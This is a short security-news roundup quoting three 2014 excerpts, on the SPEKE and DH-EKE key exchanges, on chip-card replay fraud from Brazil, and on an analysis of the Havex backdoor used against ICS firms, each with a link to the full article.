I’ve been researching PAKE algorithms recently and there doesn’t seem to be a good explanation of Encrypted Key Exchange with Diffie Hellman (DH-EKE) out there. The best way to learn something is to teach it. So in that spirit, here follows my explanation of SPEKE and DH-EKE.

more here............http://nathaniel.themccallums.org/2014/10/27/authenticated-key-exchange-with-speke-or-dh-eke/

An odd new pattern of credit card fraud emanating from Brazil and targeting U.S. financial institutions could spell costly trouble for banks that are just beginning to issue customers more secure chip-based credit and debit cards.

more here.............http://krebsonsecurity.com/2014/10/replay-attacks-spoof-chip-card-charges/

I did a presentation at the 4SICS conference earlier this week, where I disclosed the results from my analysis of the Havex RAT/backdoor.

The Havex backdoor is developed and used by a hacker group called Dragonfly, who are also known as "Energetic Bear" and "Crouching Yeti". Dragonfly is an APT hacker group, who have been reported to specifically target organizations in the energy sector as well as companies in other ICS sectors such as industrial/machinery, manufacturing and pharmaceutical.

In my 4SICS talk I disclosed a previously unpublished comprehensive view of ICS software that has been trojanized with the Havex backdoor, complete with screenshots, version numbers and checksums.

more here...........http://www.netresec.com/?page=Blog&month=2014-10&post=Full-Disclosure-of-Havex-Trojans